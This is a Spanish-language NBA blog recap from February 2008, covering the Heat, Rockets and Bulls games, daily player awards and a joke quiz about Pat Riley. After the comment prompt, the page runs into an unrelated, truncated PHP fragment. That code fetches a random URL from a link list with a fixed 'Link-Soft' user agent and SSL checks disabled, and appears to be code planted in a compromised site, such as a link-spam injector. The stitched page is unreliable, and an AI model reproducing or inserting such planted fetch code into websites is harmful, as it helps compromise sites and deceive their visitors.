La crónica (07/01/08)

08 de February de 2008 por MagicJohnson32

Como de costumbre, la noche del jueves dejó pocos partidos. Para los Heat, lo que dejó es otra derrota, y ya son 21 en los últimos 22 partidos. Anoche cayeron ante los Sixers, que se encuentran a sólo 0.5 victorias de la octava plaza del Este. Otro equipo que cada vez se acerca más a puestos de Playoffs son los Rockets, que vencieron sin muchos problemas a los Cavs pese a contar con un McGrady enfermo. Si hubo una sorpresa anoche fue el triunfo de los Bulls en Oakland, especialmente si tenemos en cuenta que Chicago no pudo contar con Hinrich, Deng ni Gordon en el debut de Chris Webber con los Warriors.

cwebberbiedrinsnelson

La crónica:

Heat 84 – 101 Sixers

Aún sin Marion ni Banks, que pasaban en esos momentos las pruebas médicas, los Heat ampliaron su cuenta de derrotas hasta las 39, la más alta de toda la NBA. Sucedió en Philadelphia, donde los de Miami se mantuvieron en el encuentro hasta el último cuarto, cuando ofrecieron su peor cara con una racha de 1 de 11 en tiros para un parcial en esos últimos doce minutos de 12-26. Wade, visiblemente frustrado, se quedó en 19 puntos con horribles porcentajes, y pese a eso fue el máximo anotador de su equipo, aunque tanto Wright como Blount lograron dobles-dobles. Para los Sixers, cada vez más cerca de posiciones de Playoffs aunque más por deméritos de Nets y Pacers que por méritos propios, Iguodala sumó 25-8-6-3-3 y Andre Miller, 21-6-7.

 

zilgauskasyaoCavs 77 – 92 Rockets

Con una sopa calentita celebró Tracy McGrady el triunfo de su equipo sobre los Cavaliers. T-Mac, uno de tantos jugadores en la liga que se ha visto afectado por la gripe, jugó casi 32 minutos en los que pudo aportar poco más que su esfuerzo. Sin embargo, bastó para superar a los Cavs gracias a Yao, con 22 puntos, 12 rebotes y 4 asistencias, y a Rafer Alston, autor de 17 puntos, 9 asistencias y 5 rebotes. Además, Battier, Scola y Wells se combinaron para sumar 38 puntos y 25 rebotes. LeBron no pudo decir lo mismo de sus compañeros, ya que Larry Hughes fue el único en alcanzar la decena de puntos y a costa de realizar malos porcentajes. James, por su parte, mantuvo aproximadamente sus estratosféricas medias con 32 puntos, 7 rebotes y 6 asistencias.

Bulls 114 – 108 Warriors chrisduhonwarriors

Realmente los Warriors han de plantearse lo sucedido anoche. Chris Duhon logró su mejor anotación como profesional con 34 puntos en una serie de 11 de 16 en tiros de campo, a los que añadió 9 asistencias, y Joe Smith le acompañó con 27 puntos y 8 rebotes para llevar a los Bulls a una sorprendente victoria en Oakland. Chicago visitaba a los de Don Nelson sin sus tres principales estrellas, Hinich, Gordon y Deng. Sin embargo Duhon y Smith, más la aportación final de Tyrus Thomas, dio el triunfo a los Bulls sobre los locales, en los que jugó sus primeros minutos Chris Webber tras firmar recientemente hasta final de temporada. Webber fue titular pero apenas jugó 12 minutos. Monta Ellis fue el mejor de su equipo con 11 de 12 en tiros, mientras que Davis y Jackson no estuvieron efectivos de cara al aro y la aportación de Biedrins (12 puntos y 18 rebotes) y de Harrington (20 puntos) no fue suficiente.

Tras las crónicas, seguimos con los premios del día.

Nuestro MVP: tal vez encajaría más en la sorpresa por lo inesperado de su actuación, pero Chris Duhon jugó tan bien anoche en el Oracle Arena que se merece el máximo galardón, porque sus 34 puntos con 11 de 16 en tiros y 9 asistencias sirvió, además, para que los Bulls ganasen en la cancha de los Warriors.

El rookie: lleva cuatro partidos consecutivos como titular y en todos ellos ha cumplido con más de 10 puntos. Anoche Thaddeus Young volvió a demostrar su solidez con 11 puntos, 7 rebotes y 2 asistencias en casi 33 minutos de juego. Valor seguro.

La sorpresa: posiblemente dejará de ser una sorpresa que Tyrus Thomas juegue más de 25 minutos, anote más de 10 puntos y resulte decisivo, pero actualmente esto no sucede con frecuencia. Ante los Warriors, Tyrus logró 15 puntos, 5 rebotes, 2 asistencias y 2 tapones, y resultó fundamental para asegurar la victoria de Chicago a domicilio.

La decepción: disculparemos a Chris Webber por ahora, porque fue su primer partido de la temporada. No así a Ricky Davis, que se quedó en 9 puntos con 9 fallos en los lanzamientos (4 de 13) y con tantas pérdidas de balón (4) como la suma de sus asistencias y recuperaciones. En un equipo tan necesitado de contribuciones de sus jugadores importantes, Davis está confirmándose como un jugador escasamente fiable.

Pasatiempos: ¿Qué hacía Pat Riley anoche, solo, sentado en el banquillo visitante del Wachovia Center de Philadelphia?

rileybenchalone A) Aguantarse la risa tras colocar a O’Neal y sus 20 millones por 3 temporadas a los Suns

B) Aguantarse las lágrimas tras asistir a una nueva derrota de su equipo

C) Tratar de calcular cuántos partidos ha perdido su equipo este año, ya que hace tiempo que perdió la cuenta

D) Firmar el finiquito a Ricky Davis

E) Firmar el finiquito a todos sus jugadores

F) Firmar su dimisión

G) Echar una cabezadita

Respuesta correcta: puede que la G, y así, tal vez, soñar con aquellos días en los que Riley ganaba anillos o al menos luchaba por conseguirlo. Lo sentimos pero hoy no tenemos presupuesto para premiar a los acertantes.

Comenta

Un comentario a esta entrada

  1. xapa_croack dice:
    #1

    que hara mas en temporada regular C-web o saq??? jojojo

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>